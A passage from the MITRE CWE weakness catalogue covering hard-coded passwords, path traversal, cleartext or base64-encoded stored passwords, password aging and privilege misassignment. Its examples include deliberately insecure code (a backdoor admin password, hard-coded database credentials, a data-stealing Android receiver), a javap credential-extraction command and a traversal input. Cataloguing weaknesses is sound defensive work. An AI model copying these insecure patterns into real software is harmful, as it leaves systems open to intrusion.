Architecture and Design + Perform access control checks and limit which entities can access the feature that requires the hard-coded password. For example, a feature might only be enabled through the system console instead of through a network connection. + + + Architecture and Design + + For inbound authentication: apply strong one-way hashes to your passwords and store those hashes in a configuration file or database with appropriate access control. That way, theft of the file/database still requires the attacker to try to crack the password. When receiving an incoming password during authentication, take the hash of the password and compare it to the hash that you have saved. + Use randomly assigned salts for each separate hash that you generate. This increases the amount of computation that an attacker needs to conduct a brute-force attack, possibly limiting the effectiveness of the rainbow table method. + + + + Architecture and Design + + For front-end to back-end connections: Three solutions are possible, although none are complete. + + The first suggestion involves the use of generated passwords which are changed automatically and must be entered at given time intervals by a system administrator. These passwords will be held in memory and only be valid for the time intervals. + Next, the passwords used should be limited at the back end to only performing actions valid for the front end, as opposed to having full access. + Finally, the messages sent should be tagged and checksummed with time sensitive values so as to prevent replay style attacks. + + + + + + + The following code uses a hard-coded password to connect to a database: + + ...DriverManager.getConnection(url, "scott", "tiger");... + + This is an example of an external hard-coded password on the client-side of a connection. This code will run successfully, but anyone who has access to it will have access to the password. Once the program has shipped, there is no going back from the database user "scott" with a password of "tiger" unless the program is patched. A devious employee with access to this information can use it to break into the system. Even worse, if attackers have access to the bytecode for application, they can use the javap -c command to access the disassembled code, which will contain the values of the passwords used. The result of this operation might look something like the following for the example above: + + javap -c ConnMngr.class22: ldc #36; //String jdbc:mysql://ixne.com/rxsql24: ldc #38; //String scott26: ldc #17; //String tiger + + + + + The following code is an example of an internal hard-coded password in the back-end: + + int VerifyAdmin(char *password) { + if (strcmp(password, "Mew!")) { + + printf("Incorrect Password!\n");return(0) + }printf("Entering Diagnostic Mode...\n");return(1); + } + + + int VerifyAdmin(String password) {if (!password.equals("Mew!")) {return(0)}//Diagnostic Modereturn(1);} + + Every instance of this program can be placed into diagnostic mode with the same password. Even worse is the fact that if this program is distributed as a binary-only distribution, it is very difficult to change that password or disable this "functionality." + + + The following examples show a portion of properties and configuration files for Java and ASP.NET applications. The files include username and password information but they are stored in cleartext. + This Java example shows a properties file with a cleartext username / password pair. + + + + # Java Web App ResourceBundle properties file + ...webapp.ldap.username=secretUsernamewebapp.ldap.password=secretPassword... + + The following example shows a portion of a configuration file for an ASP.Net application. This configuration file includes username and password information for a connection to a database but the pair is stored in cleartext. + + ...<connectionStrings><add name="ud_DEV" connectionString="connectDB=uDB; uid=db2admin; pwd=password; dbalias=uDB;" providerName="System.Data.Odbc" /></connectionStrings>... + + Username and password information should not be included in a configuration file or a properties file in cleartext as this will allow anyone who can read the file access to the resource. If possible, encrypt this information. + + + In 2022, the OT:ICEFALL study examined products by 10 different Operational Technology (OT) vendors. The researchers reported 56 vulnerabilities and said that the products were "insecure by design" [REF-1283]. If exploited, these vulnerabilities often allowed adversaries to change how the products operated, ranging from denial of service to changing the code that the products executed. Since these products were often used in industries such as power, electrical, water, and others, there could even be safety implications. + Multiple vendors used hard-coded credentials in their OT products. + + + + + CVE-2022-29964 + Distributed Control System (DCS) has hard-coded passwords for local shell access + https://www.cve.org/CVERecord?id=CVE-2022-29964 + + + CVE-2021-37555 + Telnet service for IoT feeder for dogs and cats has hard-coded password [REF-1288] + https://www.cve.org/CVERecord?id=CVE-2021-37555 + + + + + Password Management: Hard-Coded Password + + + Use of hard-coded password + + + A3 + Broken Authentication and Session Management + CWE More Specific + + + MSC03-J + Never hard code sensitive information + + + SFP33 + Hardcoded sensitive data + + + + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This entry could be split into multiple variants: an inbound variant (as seen in the second demonstrative example) and an outbound variant (as seen in the first demonstrative example). These variants are likely to have different consequences, detectability, etc. More importantly, from a vulnerability theory perspective, they could be characterized as different behaviors. + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + KDM Analytics + 2008-08-01 + added/updated white box definitions + + + Veracode + 2008-08-15 + Suggested OWASP Top Ten 2004 mapping + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2008-10-14 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2008-11-13 + Significant description modifications to emphasize different variants. + + + CWE Content Team + MITRE + 2008-11-24 + updated Demonstrative_Examples, Description, Maintenance_Notes, Other_Notes, Potential_Mitigations + + + CWE Content Team + MITRE + 2009-01-12 + updated Demonstrative_Examples, Description, Maintenance_Notes, Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2009-03-10 + updated Potential_Mitigations + + + KDM Analytics + 2009-07-17 + Improved the White_Box_Definition + + + CWE Content Team + MITRE + 2009-07-27 + updated Demonstrative_Examples, Related_Attack_Patterns, White_Box_Definitions + + + CWE Content Team + MITRE + 2010-02-16 + updated Demonstrative_Examples, Description, Detection_Factors, Name, Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2010-04-05 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2010-06-21 + updated Detection_Factors, Potential_Mitigations + + + CWE Content Team + MITRE + 2010-09-27 + updated Relationships + + + CWE Content Team + MITRE + 2010-12-13 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Potential_Mitigations, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-10-30 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2015-12-07 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2017-01-19 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2017-05-03 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2017-11-08 + updated Causal_Nature, Demonstrative_Examples, Likelihood_of_Exploit, Modes_of_Introduction, Relationships, White_Box_Definitions + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-06-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships, Type + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples, Maintenance_Notes + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Demonstrative_Examples, Observed_Examples, References + + + CWE Content Team + MITRE + 2023-01-31 + updated Applicable_Platforms, Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Hard-Coded Password + + + + The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize "/dir/../filename" sequences that can resolve to a location that is outside of that directory. + + This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory. + The '/dir/../filename' manipulation is useful for bypassing some path traversal protection schemes. Sometimes a program only checks for "../" at the beginning of the input, so a "/../" can bypass that check. + + + + + + + + + + + Implementation + + + + + Confidentiality + Integrity + Read Files or Directories + Modify Files or Directories + + + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434. + Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering "/" is insufficient protection if the filesystem also supports the use of "\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if "../" sequences are removed from the ".../...//" string in a sequential fashion, two instances of "../" would be removed from the original string, but the remaining characters would still form the "../" string. + + + + Implementation + Input Validation + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. + + + + + '/directory/../filename + + + SFP16 + Path Traversal + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2009-07-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-06-21 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2011-03-29 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Path Issue - Leading Directory Dot Dot Slash - '/directory/../filename' + + + + The product stores a password in a configuration file that might be accessible to actors who do not know the password. + This can result in compromise of the system for which the password is used. An attacker could gain access to this file and learn the stored password or worse yet, change the password to one of their choosing. + + + + + + + + + Architecture and Design + OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. + + + Implementation + + + + + Access Control + Gain Privileges or Assume Identity + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Architecture and Design + Avoid storing passwords in easily accessible locations. + + + Architecture and Design + Consider storing cryptographic hashes of passwords as an alternative to storing in plaintext. + + + + + Below is a snippet from a Java properties file. + + webapp.ldap.username = secretUsernamewebapp.ldap.password = secretPassword + + Because the LDAP credentials are stored in plaintext, anyone with access to the file can gain access to the resource. + + + The following examples show a portion of properties and configuration files for Java and ASP.NET applications. The files include username and password information but they are stored in cleartext. + This Java example shows a properties file with a cleartext username / password pair. + + + + # Java Web App ResourceBundle properties file + ...webapp.ldap.username=secretUsernamewebapp.ldap.password=secretPassword... + + The following example shows a portion of a configuration file for an ASP.Net application. This configuration file includes username and password information for a connection to a database but the pair is stored in cleartext. + + ...<connectionStrings><add name="ud_DEV" connectionString="connectDB=uDB; uid=db2admin; pwd=password; dbalias=uDB;" providerName="System.Data.Odbc" /></connectionStrings>... + + Username and password information should not be included in a configuration file or a properties file in cleartext as this will allow anyone who can read the file access to the resource. If possible, encrypt this information. + + + + File or Directory + + + + Password Management: Password in Configuration File + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + Sean Eidemiller + Cigital + 2008-07-01 + added/updated demonstrative examples + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Demonstrative_Examples, Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Affected_Resources, Applicable_Platforms, Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships, Type + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Obscuring a password with a trivial encoding does not protect the password. + Password management issues occur when a password is stored in plaintext in an application's properties or configuration file. A programmer can attempt to remedy the password management problem by obscuring the password with an encoding function, such as base 64 encoding, but this effort does not adequately protect the password. + + + + + + + + + Architecture and Design + COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic. + + + + + Access Control + Gain Privileges or Assume Identity + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Passwords should be encrypted with keys that are at least 128 bits in length for adequate security. + + + + + The following code reads a password from a properties file and uses the password to connect to a database. + + ...Properties prop = new Properties();prop.load(new FileInputStream("config.properties"));String password = Base64.decode(prop.getProperty("password"));DriverManager.getConnection(url, usr, password);... + + This code will run successfully, but anyone with access to config.properties can read the value of password and easily determine that the value has been base 64 encoded. If a devious employee has access to this information, they can use it to break into the system. + + + The following code reads a password from the registry and uses the password to create a new network credential. + + ...string value = regKey.GetValue(passKey).ToString();byte[] decVal = Convert.FromBase64String(value);NetworkCredential netCred = newNetworkCredential(username,decVal.toString(),domain);... + + This code will run successfully, but anyone who has access to the registry key used to store the password can read the value of password. If a devious employee has access to this information, they can use it to break into the system. + + + + + Password Management: Weak Cryptography + + + A8 + Insecure Storage + CWE More Specific + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + The "crypt" family of functions uses weak cryptographic algorithms and should be avoided. It may be present in some projects for compatibility. + + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + Veracode + 2008-08-15 + Suggested OWASP Top Ten 2004 mapping + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-07-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-03-29 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2015-12-07 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Name, Other_Notes, References, Relationships, Type + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Weak Cryptography for Passwords + + + + The product does not have a mechanism in place for managing password aging. + + Password aging (or password rotation) is a policy that forces users to change their passwords after a defined time period passes, such as every 30 or 90 days. Without mechanisms such as aging, users might not change their passwords in a timely manner. + Note that while password aging was once considered an important security feature, it has since fallen out of favor by many, because it is not as effective against modern threats compared to other mechanisms such as slow hashes. In addition, forcing frequent changes can unintentionally encourage users to select less-secure passwords. However, password aging is still in use due to factors such as compliance requirements, e.g., Payment Card Industry Data Security Standard (PCI DSS). + + + + + + + + + + + + Architecture and Design + COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic. + + + Low + + + Access Control + Gain Privileges or Assume Identity + As passwords age, the probability that they are compromised grows. + + + + + Architecture and Design + As part of a product's design, require users to change their passwords regularly and avoid reusing previous passwords. + + + Implementation + Developers might disable clipboard paste operations into password fields as a way to discourage users from pasting a password into a clipboard. However, this might encourage users to choose less-secure passwords that are easier to type, and it can reduce the usability of password managers [REF-1294]. + Discouraged Common Practice + + + + + A system does not enforce the changing of passwords every certain period. + + + + + Not allowing password aging + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-03-29 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships + + + CWE Content Team + MITRE + 2014-06-23 + updated Other_Notes, Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Likelihood_of_Exploit, Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Demonstrative_Examples, Description, Potential_Mitigations, References, Type + + + CWE Content Team + MITRE + 2020-08-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2022-10-13 + updated Description, Potential_Mitigations, References, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + Kurt Seifried, Chris Eng, G. Ann Campbell, Larry Shields, Jeffrey Walton, Jason Dryhurst-Smith, and other members of the CWE Community + 2021-12-03 + Gave feedback on how to update CWE-262 and CWE-263 due to changing password management practices + + Not Allowing Password Aging + + + + The product supports password aging, but the expiration period is too long. + + Password aging (or password rotation) is a policy that forces users to change their passwords after a defined time period passes, such as every 30 or 90 days. A long expiration provides more time for attackers to conduct password cracking before users are forced to change to a new password. + Note that while password aging was once considered an important security feature, it has since fallen out of favor by many, because it is not as effective against modern threats compared to other mechanisms such as slow hashes. In addition, forcing frequent changes can unintentionally encourage users to select less-secure passwords. However, password aging is still in use due to factors such as compliance requirements, e.g., Payment Card Industry Data Security Standard (PCI DSS). + + + + + + + + + + Architecture and Design + COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic. + + + Low + + + Access Control + Gain Privileges or Assume Identity + As passwords age, the probability that they are compromised grows. + + + + + Architecture and Design + Ensure that password aging is limited so that there is a defined maximum age for passwords. Note that if the expiration window is too short, it can cause users to generate poor or predictable passwords. + + + Architecture and Design + Ensure that the user is notified several times leading up to the password expiration. + + + Architecture and Design + Create mechanisms to prevent users from reusing passwords or creating similar passwords. + + + Implementation + Developers might disable clipboard paste operations into password fields as a way to discourage users from pasting a password into a clipboard. However, this might encourage users to choose less-secure passwords that are easier to type, and it can reduce the usability of password managers [REF-1294]. + Discouraged Common Practice + + + + + A system requires the changing of passwords every five years. + + + + + Allowing password aging + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-03-29 + updated Description, Other_Notes, Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Likelihood_of_Exploit, Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Demonstrative_Examples, References + + + CWE Content Team + MITRE + 2020-08-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2022-10-13 + updated Description, Potential_Mitigations, References, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + Kurt Seifried, Chris Eng, G. Ann Campbell, Larry Shields, Jeffrey Walton, Jason Dryhurst-Smith, and other members of the CWE Community + 2021-12-03 + Gave feedback on how to update CWE-262 and CWE-263 due to changing password management practices + + Allowing Unchecked Password Aging + + + + A product incorrectly assigns a privilege to a particular actor, creating an unintended sphere of control for that actor. + + + + + + + Resultant + + + + + + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + + + Access Control + Gain Privileges or Assume Identity + A user can access restricted functionality and/or sensitive information that may include administrative functionality and user accounts. + + + + + Architecture and Design + Operation + Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software. + + + Architecture and Design + Operation + Environment Hardening + Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations. + + + + + The following example demonstrates the weakness. + + seteuid(0); + /* do some stuff */ + + seteuid(getuid()); + + + + The following example demonstrates the weakness. + + AccessController.doPrivileged(new PrivilegedAction() { + public Object run() { + // privileged code goes here, for example: + System.loadLibrary("awt");return null; + // nothing to return + + } + + + + + + This application sends a special intent with a flag that allows the receiving application to read a data file for backup purposes. + + Intent intent = new Intent();intent.setAction("com.example.BackupUserData");intent.setData(file_uri);intent.addFlags(FLAG_GRANT_READ_URI_PERMISSION);sendBroadcast(intent); + + + public class CallReceiver extends BroadcastReceiver {@Overridepublic void onReceive(Context context, Intent intent) {Uri userData = intent.getData();stealUserData(userData);}} + + Any malicious application can register to receive this intent. Because of the FLAG_GRANT_READ_URI_PERMISSION included with the intent, the malicious receiver code can read the user's data. + + + + + CVE-1999-1193 + untrusted user placed in unix "wheel" group + https://www.cve.org/CVERecord?id=CVE-1999-1193 + + + CVE-2005-2741 + Product allows users to grant themselves certain rights that can be used to escalate privileges. + https://www.cve.org/CVERecord?id=CVE-2005-2741 + + + CVE-2005-2496 + Product uses group ID of a user instead of the group, causing it to run with different privileges. This is resultant from some other unknown issue. + https://www.cve.org/CVERecord?id=CVE-2005-2496 + + + CVE-2004-0274 + Product mistakenly assigns a particular status to an entity, leading to increased privileges. + https://www.cve.org/CVERecord?id=CVE-2004-0274 + + + + System Process + + + + Incorrect Privilege Assignment + + + SEC00-J + Do not allow privileged blocks to leak sensitive information across a trust boundary + + + SEC01-J + Do not allow tainted variables in privileged blocks + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Relationships, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2009-03-10 + updated Relationships + + + CWE Content Team + MITRE + 2009-12-28 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-06-21 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, Demonstrative_Examples, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations, References + + + CWE Content Team + MITRE + 2014-02-18 + updated Applicable_Platforms, Demonstrative_Examples + + + CWE Content Team + MITRE + 2017-11-08 + updated Causal_Nature, Modes_of_Introduction, References, Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated References + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + A particular privilege, role, capability, or right can be used to perform unsafe actions that were not intended, even when it is assigned to the correct entity. + + + + + + + + + Architecture and Design + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + Operation + + + + + Access Control + Gain Privileges or Assume Identity + A user can access restricted functionality and/or sensitive information that may include administrative functionality and user accounts. + + + + + Architecture and Design + Operation + Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software. + + + Architecture and Design + Operation + Environment Hardening + Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations. + + + + + This code intends to allow only Administrators to print debug information about a system. + + public enum Roles {ADMIN,USER,GUEST} + public void printDebugInfo(User requestingUser){ + if(isAuthenticated(requestingUser)){ + switch(requestingUser.role){ + case GUEST:System.out.println("You are not authorized to perform this command");break; + default:System.out.println(currentDebugState());break; + + } + }else{System.out.println("You must be logged in to perform this command");} + } + + While the intention was to only allow Administrators to print the debug information, the code as written only excludes those with the role of "GUEST". Someone with the role of "ADMIN" or "USER" will be allowed access, which goes against the original intent. An attacker may be able to use this debug information to craft an attack on the system. + + + + + CVE-2002-1981 + Roles have access to dangerous procedures (Accessible entities). + https://www.cve.org/CVERecord?id=CVE-2002-1981 + + + CVE-2002-1671 + Untrusted object/method gets access to clipboard (Accessible entities). + https://www.cve.org/CVERecord?id=CVE-2002-1671 + + + CVE-2004-2204 + Gain privileges using functions/tags that should be restricted (Accessible entities). + https://www.cve.org/CVERecord?id=CVE-2004-2204 + + + CVE-2000-0315 + Traceroute program allows unprivileged users to modify source address of packet (Accessible entities). + https://www.cve.org/CVERecord?id=CVE-2000-0315 + + + CVE-2004-0380 + Bypass domain restrictions using a particular file that references unsafe URI schemes (Accessible entities). + https://www.cve.org/CVERecord?id=CVE-2004-0380 + + + CVE-2002-1154 + Script does not restrict access to an update command, leading to resultant disk consumption and filled error logs (Accessible entities). + https://www.cve.org/CVERecord?id=CVE-2002-1154 + + + CVE-2002-1145 + "public" database user can use stored procedure to modify data controlled by the database owner (Unsafe privileged actions). + https://www.cve.org/CVERecord?id=CVE-2002-1145 + + + CVE-2000-0506 + User with capability can prevent setuid program from dropping privileges (Unsafe privileged actions). + https://www.cve.org/CVERecord?id=CVE-2000-0506 + + + CVE-2002-2042 + Allows attachment to and modification of privileged processes (Unsafe privileged actions). + https://www.cve.org/CVERecord?id=CVE-2002-2042 + + + CVE-2000-1212 + User with privilege can edit raw underlying object using unprotected method (Unsafe privileged actions). + https://www.cve.org/CVERecord?id=CVE-2000-1212 + + + CVE-2005-1742 + Inappropriate actions allowed by a particular role(Unsafe privileged actions). + https://www.cve.org/CVERecord?id=CVE-2005-1742 + + + CVE-2001-1480 + Untrusted entity allowed to access the system clipboard (Unsafe privileged actions). + https://www.cve.org/CVERecord?id=CVE-2001-1480 + + + CVE-2001-1551 + Extra Linux capability allows bypass of system-specified restriction (Unsafe privileged actions). + https://www.cve.org/CVERecord?id=CVE-2001-1551 + + + CVE-2001-1166 + User with debugging rights can read entire process (Unsafe privileged actions). + https://www.cve.org/CVERecord?id=CVE-2001-1166 + + + CVE-2005-1816 + Non-root admins can add themselves or others to the root admin group (Unsafe privileged actions). + https://www.cve.org/CVERecord?id=CVE-2005-1816 + + + CVE-2005-2173 + Users can change certain properties of objects to perform otherwise unauthorized actions (Unsafe 